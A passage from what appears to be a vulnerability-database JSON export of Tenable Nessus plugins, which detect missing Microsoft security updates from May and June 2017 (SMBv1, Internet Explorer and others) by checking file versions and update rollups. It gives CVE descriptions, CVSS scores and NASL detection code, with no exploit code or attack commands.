can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019214/windows-server-2012-update-kb4019214\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8ae1f0e3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4019214 or Cumulative update KB4019216.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkbs = make_list(\n '4019214', # 2012 Monthly Rollup\n '4019216' # 2012 Security Rollup\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif ( smb_check_rollup(os:\"6.2\", sp:0, rollup_date: \"05_2017\", bulletin:bulletin, rollup_kb_list:[4019214,4019216]) )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-22T16:25:55", "description": "The remote Windows Vista host is missing a security update. It is, therefore, affected by the following vulnerabilities :\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - Multiple information disclosure vulnerabilities exist in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit these, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267, CVE-2017-0268, CVE-2017-0270, CVE-2017-0271, CVE-2017-0274, CVE-2017-0275, CVE-2017-0276)\n\n - Multiple denial of service vulnerabilities exist in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit these, via a crafted SMB request, to cause the system to stop responding. (CVE-2017-0269, CVE-2017-0273, CVE-2017-0280)\n\n - Multiple remote code execution vulnerabilities exist in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit these, via a specially crafted packet, to execute arbitrary code on a target server. (CVE-2017-0272, CVE-2017-0277, CVE-2017-0278, CVE-2017-0279)\n\n - A remote code execution vulnerability exists in Windows due to improper handling of shortcuts. An unauthenticated, remote attacker can exploit this, by convincing a user to insert a removable drive containing a malicious shortcut and binary, to automatically execute arbitrary code in the context of the current user. (CVE-2017-8464)\n\n - A remote code execution vulnerability exists in the Windows Search functionality due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, via a specially crafted SMB message, to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the GDI component due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted document or visit a specially crafted website, to disclose the contents of memory. (CVE-2017-8552)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-14T00:00:00", "type": "nessus", "title": "Microsoft Security Advisory 4025685: Windows Vista (June 2017)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0222", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280", "CVE-2017-8464", "CVE-2017-8543", "CVE-2017-8552"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_JUN_4025685_VISTA.NASL", "href": "https://www.tenable.com/plugins/nessus/100785", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100785);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2017-0222\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\",\n \"CVE-2017-8464\",\n \"CVE-2017-8543\",\n \"CVE-2017-8552\"\n );\n script_bugtraq_id(\n 98127,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98818,\n 98824,\n 99035\n );\n script_xref(name:\"MSKB\", value:\"4018271\");\n script_xref(name:\"MSKB\", value:\"4018466\");\n script_xref(name:\"MSKB\", value:\"4019204\");\n script_xref(name:\"MSKB\", value:\"4021903\");\n script_xref(name:\"MSKB\", value:\"4024402\");\n script_xref(name:\"MSFT\", value:\"MS17-4018271\");\n script_xref(name:\"MSFT\", value:\"MS17-4018466\");\n script_xref(name:\"MSFT\", value:\"MS17-4019204\");\n script_xref(name:\"MSFT\", value:\"MS17-4021903\");\n script_xref(name:\"MSFT\", value:\"MS17-4024402\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/14\");\n\n script_name(english:\"Microsoft Security Advisory 4025685: Windows Vista (June 2017)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows Vista host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - Multiple information disclosure vulnerabilities exist in\n the Microsoft Server Message Block 1.0 (SMBv1) server\n when handling certain requests. An unauthenticated,\n remote attacker can exploit these, via a specially\n crafted packet, to disclose sensitive information.\n (CVE-2017-0267, CVE-2017-0268, CVE-2017-0270,\n CVE-2017-0271, CVE-2017-0274, CVE-2017-0275,\n CVE-2017-0276)\n\n - Multiple denial of service vulnerabilities exist in\n Microsoft Server Message Block (SMB) when handling a\n specially crafted request to the server. An\n unauthenticated, remote attacker can exploit these, via\n a crafted SMB request, to cause the system to stop\n responding. (CVE-2017-0269, CVE-2017-0273,\n CVE-2017-0280)\n\n - Multiple remote code execution vulnerabilities exist in\n the Microsoft Server Message Block 1.0 (SMBv1) server\n when handling certain requests. An unauthenticated,\n remote attacker can exploit these, via a specially\n crafted packet, to execute arbitrary code on a target\n server. (CVE-2017-0272, CVE-2017-0277, CVE-2017-0278,\n CVE-2017-0279)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n GDI component due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n document or visit a specially crafted website, to\n disclose the contents of memory. (CVE-2017-8552)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2017/4025685\");\n # https://support.microsoft.com/en-us/help/4025687/microsoft-security-advisory-4025685-guidance-for-older-platforms\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0780816\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-06\";\nkbs = make_list(\n \"4018271\",\n \"4018466\",\n \"4021903\",\n \"4024402\",\n \"4019204\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\n# Only Vista\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Vista\" >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # 4018271 aka CVE-2017-0222\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.16896\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4018271\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21007\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4018271\") ||\n\n # 4018466 aka CVE-2017-0267 to 0280\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"netevent.dll\", version:\"6.0.6002.19673\", min_version:\"6.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4018466\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"netevent.dll\", version:\"6.0.6002.24089\", min_version:\"6.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4018466\") ||\n\n # 4021903 aka CVE-2017-8464\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"shell32.dll\", version:\"6.0.6002.19785\", min_version:\"6.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4021903\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"shell32.dll\", version:\"6.0.6002.24102\", min_version:\"6.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4021903\") ||\n\n # 4024402 aka CVE-2017-8543\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"searchindexer.exe\", version:\"7.0.6002.19805\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4024402\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"searchindexer.exe\", version:\"7.0.6002.24123\", min_version:\"7.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4024402\") ||\n\n # 4019204 aka CVE-2017-8552\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.19778\", min_version:\"6.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4019204\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.24095\", min_version:\"6.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4019204\")\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:23:28", "description": "The remote Windows host is missing security update 4019213 or cumulative update 4019215. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - A denial of service vulnerability exists in the Windows DNS server when it's configured to answer version queries. An unauthenticated, remote attacker can exploit this, via a malicious DNS query, to cause the DNS server to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the Windows Graphics Device Interface (GDI) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "Windows 8.1 and Windows Server 2012 R2 May 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0171", "CVE-2017-0190", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0228", "CVE-2017-0231", "CVE-2017-0238", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019215.NASL", "href": "https://www.tenable.com/plugins/nessus/100057", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100057);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0171\",\n \"CVE-2017-0190\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0228\",\n \"CVE-2017-0231\",\n \"CVE-2017-0238\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98097,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98164,\n 98173,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4019215\");\n script_xref(name:\"MSKB\", value:\"4019213\");\n script_xref(name:\"MSFT\", value:\"MS17-4019215\");\n script_xref(name:\"MSFT\", value:\"MS17-4019213\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Windows 8.1 and Windows Server 2012 R2 May 2017 Security Updates\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4019213\nor cumulative update 4019215. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - A denial of service vulnerability exists in the Windows\n DNS server when it's configured to answer version\n queries. An unauthenticated, remote attacker can exploit\n this, via a malicious DNS query, to cause the DNS server\n to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics Device Interface (GDI) due to improper\n handling of objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - A remote 